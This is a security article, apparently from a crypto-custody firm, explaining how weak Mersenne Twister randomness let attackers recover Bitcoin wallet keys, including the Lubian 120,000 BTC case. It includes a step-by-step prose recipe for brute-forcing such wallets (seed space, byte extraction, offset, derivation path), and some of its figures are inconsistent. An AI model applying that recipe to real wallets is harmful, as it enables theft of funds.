When randomness is no longer random: The truth behind the theft of 120,000 BTC

Original source: Max He@Safeheron Lab

Recently, the cryptocurrency community has been widely discussing a significant piece of news: U.S. law enforcement is suspected of having obtained the private keys to approximately 120,000 bitcoins involved in the mysterious transfer of 2020, valued at up to $15 billion. According to a report by Elliptic, these assets were initially associated with the mining pool Lubian.com and were later officially confiscated by the U.S. Department of Justice. There is widespread speculation that law enforcement agencies may have exploited a flaw in the random number generation during wallet creation to reconstruct or take over the private keys, while some believe this is a technological hacking operation led by the U.S. government.

The news has caused a strong shock throughout the cryptocurrency industry and quickly became a focal topic within the sector. It has sparked widespread discussions not only on the technical and security aspects but also raised new concerns among investors regarding the reliability and risk prevention of crypto assets. This article will systematically sort through the event and its underlying security roots from both technical and factual perspectives, delve into the key technical details, comprehensively review the evolution of the event, and explore its potential far-reaching impacts.

Random Numbers and Private Key Security: The Lifeline of the Blockchain World

In the world of blockchain, random numbers are considered the cornerstone of cryptographic security. Every Bitcoin or Ethereum wallet's private key is generated by random numbers—once the random number lacks sufficient “randomness,” hackers may be able to predict the private key, thereby directly stealing digital assets. To effectively mitigate this risk, wallets must use a cryptographically secure random number generator (CSPRNG) to ensure that the generated random numbers are truly unpredictable and non-reproducible.

Wallets that rely on insecure random algorithms may appear to function normally on the surface, but they actually conceal hidden dangers: once the randomness is successfully predicted, asset loss becomes irreversible.

History Repeats Itself: Insights from Multiple Major Security Incidents

During the period from 2022 to 2023, several major security incidents triggered by the same random number vulnerability were disclosed one after another, fully exposing the severity and widespread nature of this issue.

Security Incident 1: Wintermute's painful lesson of losing 160 million dollars

On September 20, 2022, the well-known market maker Wintermute suffered a major security incident, with approximately $160 million in digital assets stolen. The attackers cleverly exploited a vulnerability in the address generation tool Profanity, which in some usages relies on Mersenne Twister (MT19937) as a pseudorandom number source to generate “vanity addresses.”

Due to the predictability of MT19937's output in the absence of sufficient entropy injection, attackers were able to reproduce part of the address/private key generation process, successfully calculating the corresponding private key and transferring funds. This case became a landmark event in the history of cryptocurrency as the first instance of an institutional-level wallet being breached due to the misuse of random numbers, marking the evolution of the randomness issue from mere developer negligence to a systemic security risk.

Regarding this attack, Safeheron analyzed the detailed technical aspects of the attack at that time and replicated the attack process.

Security Incident 2: Trust Wallet Random Number Vulnerability Causes Trust Crisis

In April 2023, security researchers discovered that the Trust Wallet browser extension (version 0.0.172–0.0.182) used a non-cryptographically secure random function when generating wallet mnemonic phrases, which also relied on the Mersenne Twister (MT19937) pseudorandom number algorithm as shown in the figure below, with a random space of only about 2^32 possibilities, which is far from sufficient to resist brute-force attacks.

Attackers can enumerate all possible mnemonic combinations within a limited time, thereby reconstructing private keys and stealing user assets. Trust Wallet officials subsequently released an announcement, officially confirming the existence of the vulnerability and urgently reminding affected users to migrate their assets in a timely manner. According to an official statement from the project community forum, this vulnerability has resulted in potential losses of approximately $170,000, as attackers may have successfully exploited this vulnerability to carry out targeted attacks.

This incident became the first case of a random number vulnerability affecting mainstream wallet end users, and it also marked the first time that the issue of “random number security” drew widespread public attention.

Security Incident 3: Libbitcoin Explorer (bx seed) Weak Random Number Incident

In August 2023, the security research team Distrust announced the discovery of a severe random number vulnerability in the command-line tool Libbitcoin Explorer (bx) version 3.x. This tool uses the Mersenne Twister (MT19937) pseudo-random number generator internally when executing the bx seed command to generate wallet seeds, relying solely on system time as the seed source, resulting in very low randomness and predictable output. An attacker could enumerate all possible seed values within a limited time to reconstruct the wallet private key and directly steal assets.

The vulnerability affects all users who generated wallets using Libbitcoin Explorer 3.x, as well as related applications that depend on the libbitcoin-system 3.6 library. As of August 2023, more than $900,000 in cryptocurrency assets have been stolen due to this vulnerability. After the vulnerability was disclosed, it was officially registered as CVE-2023-39910.

Although Libbitcoin-explorer has timely applied the correct security patch, the matter does not end there.

The Huge Iceberg Rising Above the Water

After the security incident disclosure of Libbitcoin Explorer 3.x, a white-hat researcher team led by Distrust established the MilkSad project to continuously track the impact of vulnerabilities and promote community response.

By 2024, researchers systematically outlined the generation mechanisms, wallet types, and configurations of pseudo-random number generators (PRNGs) for these “weak wallets” for the first time, revealing their potential connections to the Bitcoin mining pool Lubian.com and the distribution characteristics of related funds.

In 2025, with the help of key clues provided by an anonymous white hat researcher, a long-stalled analysis made a breakthrough. The MilkSad team discovered that the affected software introduced a new parameter - the PRNG offset - when generating private keys. This finding allowed researchers to reconnect previously scattered wallet groups, revealing a unified random number generation pattern behind it. This discovery became key to understanding the causes of the entire “weak wallet” incident.

According to further in-depth analysis by the team, the 2,630 problematic wallets initially discovered in 2023 are just the tip of the iceberg. By searching different segments of the PRNG output, researchers have now successfully reconstructed and identified over 227,200 independent wallets (as shown in the figure below), all of which have valid usage records on the mainnet, forming the largest cluster of “weak random wallets” to date.

On-chain data shows that this batch of wallets generated by random number defects holds approximately 137,000 bitcoins (BTC). Within just two hours on December 28, 2020, these wallets were concentratedly emptied, with the balance plummeting from 137,000 to less than 200, of which about 9,500 BTC flowed to the payment address of the mining pool Lubian, while the remaining approximately 120,000 BTC is presumed to have been transferred to wallets controlled by the attacker. All suspicious transactions used the same transaction fee, exhibiting obvious characteristics of automated bulk transfers.

New important clues have emerged in this matter, further confirming the actual existence of this large-scale theft incident. Researchers discovered on the Bitcoin mainnet that some victim wallets exhibited abnormal transaction activity on July 3, 2022, and July 25, 2024. These transactions embedded the exact same information through the OP_RETURN mechanism:

“MSG from LB. To the whitehat who is saving our asset, you can contact us through 1228btc@gmail.com to discuss the return of asset and your reward.”

Researchers speculate that “LB” may refer to Lubian.com, and “saving our asset” may point to the massive fund transfer event on December 28, 2020. These messages were broadcast multiple times to different addresses, seemingly an attempt by Lubian to establish contact with the “white hats” who control the assets, discussing the public attempt to return the assets and rewards.

However, due to the fact that the private keys of these wallets have long been compromised, theoretically anyone can initiate transactions or write messages from these addresses. Therefore, it is still impossible to confirm with certainty whether this information truly comes from the Lubian team or if it is a misleading or prank operation.

At this point, the main body of the iceberg has finally surfaced — a systemic vulnerability caused by a random number defect has developed into one of the largest and most far-reaching security incidents in Bitcoin's history.

Technical Details: The Complete Process of Bruteforcing 220,000 BTC Wallets

So, how were these 220,000 weak random BTC wallets generated? Let's take a detailed look at the specific technical search process.

Step 1: Choose the same pseudo-random number generator (PRNG) MT19937 to generate random numbers. Again, it is emphasized that this PRNG has no cryptographic security.

Step 2: Initialize MT19937 with a very low entropy seed (0 to 2^32-1). These BTC wallet private keys can be inferred so quickly, and the low entropy seed is the biggest culprit.

Step 3: MT19937 outputs a 32-bit integer in each round, but not all of it is used; only the highest 8 bits are selected, which means that in each round, MT19937 will obtain one byte.

Step 4: Introduce the OFFSET feature to expand the private key range. It should be noted that the private key seed in BTC is 32 bytes (equivalent to 24 mnemonic words, i.e., 256 bit), and these 32 bytes are obtained from the rounds of (32 * OFFSET) to (32 * OFFSET + 31), thus generating the BTC private key seed. It should be noted that the private key seed in BTC is 32 bytes, specifically:

(1) Rounds 0 to 31, output 32-byte private key.

(2) Rounds 32 to 63, output 32-byte private key.

(3) Round 32 * 2 to 95, output a 32-byte private key.

(4) Similarly, OFFSET can be up to 3232.

Step 5: Based on the private key seed, use the public BIP32 wallet derivation algorithm, and derive the child public-private key pair using the derivation path m/49'/0'/0'/0/0.

Step 6: Generate a P2WPKH-nested-in-P2SH type wallet address with a prefix of 3 based on the child public key.

Step 7: If the generated address has indeed been used on the chain, it indicates that a weak random number wallet has been successfully found. Record its wallet address and corresponding private key.

The entire search process above is deterministic, and the only variable is the choice of the low-entropy seed, which has 2^32 possibilities. This is far lower than the 2^256 space of standard BTC private keys, so all 220,000 weak random wallets and their corresponding private keys can be obtained through brute-force searching.

The Complete Story Behind It All

Let’s fully outline the development of the entire event.

As early as several years ago (dating back to 2018), some digital asset projects erroneously introduced pseudo-random number generators (PRNGs) that lacked cryptographic security during their development process, applying them to the highly sensitive area of wallet private key generation. Due to the developers' lack of understanding of cryptographic security at the time, this mistake went unnoticed, laying the groundwork for subsequent large-scale vulnerabilities.

Unfortunately, over time, this issue was gradually discovered and maliciously exploited by hackers. Different attack groups launched several well-known attacks based on the same principle, including the Wintermute theft, the Trust Wallet random number vulnerability incident, and the Libbitcoin weak wallet incident. These attacks collectively resulted in hundreds of millions of dollars in asset losses and made “random number security,” a technical detail that was originally overlooked, a focal point in the industry.

Researchers found that all victim wallets shared similar randomization flaws while analyzing the commonalities of these events, which could be traced back to the earlier Lubian mining pool theft incident. After in-depth research, they confirmed that the wallets used by Lubian also relied on an insecure random number generation mechanism, making them part of this “weak wallet” group. Subsequent systematic analysis revealed an even more astonishing fact: there are approximately 220,000 weak random wallets across the entire network, involving a total amount of 120,000 BTC, constituting the largest and most far-reaching random number security incident to date.

As for the rumors circulating outside that “the U.S. Department of Justice led the Lubian.com hacking incident,” they mainly stem from a subtle fact: during the official intervention of the Department of Justice in handling the related assets, the previously dormant Lubian-associated Bitcoin addresses suddenly experienced a large-scale asset transfer. The timing of this coincidental transfer and the direct association of the on-chain addresses have raised suspicions among many observers, who believe that the government may have used violent cracking methods to recover the related private keys. There is also another possibility — that the U.S. government did not directly crack the private keys violently, but rather controlled the individuals or entities holding the private keys, thereby facilitating the fund transfer.

Although this batch of wallets belongs to weak random wallets that can be breached, their private keys can theoretically be reproduced through technical means. However, as of now, there is still no publicly available and verifiable evidence indicating that the U.S. government has led a “brute force” attack on the corresponding private keys. Unless relevant authorities officially acknowledge the fact of technical intervention, the true process of the entire incident will remain shrouded in mystery.

How to obtain cryptographically secure random numbers?

Now we have recognized the importance of secure random numbers, so how should we correctly obtain them in practical development and application? The following principles should be followed:

(1) Prefer to use the security interfaces provided by the operating system to generate random numbers based on the system entropy pool.

(2) Use a secure hardware entropy source, such as the hardware random number instructions of Intel SGX CPUs, when conditions permit.

(3) In the MPC scenario, multiple entropy sources can be integrated to enhance overall security, for example, by combining the entropy pool of the Linux system with the hardware random number generator of Intel SGX CPUs, thereby avoiding the risk of a single entropy source failing or being predicted.

(4) Use secure random number generation interfaces from widely validated cryptographic libraries, such as libsodium, BoringSSL, OpenSSL, etc.

(5) Ensure that the seed entropy is not less than 128–256 bit, and prohibit the use of low-entropy sources such as timestamps and process IDs as seeds.

(6) It is strictly prohibited to use non-cryptographic secure pseudorandom number generators (non-CSPRNG), such as Mersenne Twister (MT19937), Math.random(), rand().

Advantages of Multi-Source Entropy Fusion in MPC

Compared to a unilateral system, MPC has a natural advantage in entropy fusion: each participant can independently provide a source of random entropy, and the final random result is jointly generated by all parties. As long as any one party remains honest, the randomness of the entire system cannot be predicted or manipulated. This multi-source random structure significantly enhances the overall security and tamper resistance of the system, making it one of the core advantages of the MPC protocol in terms of security.

Safeheron has built a digital asset security custody protocol based on MPC and TEE technology. In this solution, the participants of the MPC protocol use various independent sources of security entropy, including the Linux system entropy pool and TEE hardware entropy sources (such as Intel SGX hardware random number instructions). This multi-source entropy fusion mechanism not only strengthens the security boundary of the system but also lays a higher security baseline for constructing a trusted execution environment (TEE) and a distributed signature system.

Conclusion

The seemingly mysterious “120,000 Bitcoin theft” incident revealed not a breach of some algorithm, but rather that early developers mistakenly used a non-cryptographically secure random number algorithm during the private key generation process, fundamentally undermining the security of the entire system.

The security of crypto assets ultimately depends on the rigor of the cryptographic implementation. Any minor engineering oversight can be successfully exploited by hackers and ultimately determine the ownership of digital assets. Only by ensuring the security of random numbers from the source, using trusted entropy sources and verified cryptographic libraries, can “randomness” return to its original meaning—unpredictable and immutable.